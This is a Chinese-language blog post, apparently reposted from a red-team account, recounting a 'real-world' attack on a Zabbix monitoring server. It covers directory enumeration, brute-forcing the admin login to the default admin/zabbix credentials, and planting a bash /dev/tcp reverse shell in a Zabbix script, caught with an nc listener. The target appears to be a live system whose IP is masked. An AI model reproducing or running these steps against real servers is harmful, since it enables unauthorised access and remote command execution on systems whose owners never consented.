『实战渗透』Zabbix | 您所在的位置:网站首页 › zabbix账号密码 › 『实战渗透』Zabbix |
saulGoodman 一个专注于红队攻防研究的公众号 关注 Zabbix-弱口令再到命令执行Getshell 信息搜集先是枚举了一下目录: ![]() 得到了一些可利用的文件: [06:13:52] 200 - 86KB - /phpinfo.php [06:13:56] 200 - 2KB - /setup.php [06:14:01] 200 - 2KB - /users.phpphpinfo中可以得到一些信息:用的是Linux操作系统: ![]() 通过DOCUMENT_ROOT函数得知网站的绝对路径是/opt/httpd-2.4.29/htdocs: ![]() 接着来到:http://xx.xx.xx.xx/setup.php,是一个安装页面,不管他。要是我重新给他安装了web,我估计第二天就能去警察叔叔那里喝茶谈人生了 ![]() 第三个页面是:http://xx.xx.xx.xx/users.php: ![]() 掏出我的BurpSuite+大字典集合得到账号密码为:admin / zabbix 进入到了后台: ![]() 在管理-脚本-创建脚本写入反弹shell命令: bash -i >& /dev/tcp/VPS的IP/6666 0>&1![]() 在监测-问题处打开一个主机,然后找到刚刚创建的脚本power-liu: ![]() 这个时候我们的 VPS 用 nc 监听 : nc -lvp 6666![]() 即可成功反弹一枚 shell! ![]() 由于网络安全法的原因,我没深入!点到为止就好了 |
CopyRight 2018-2019 实验室设备网 版权所有 |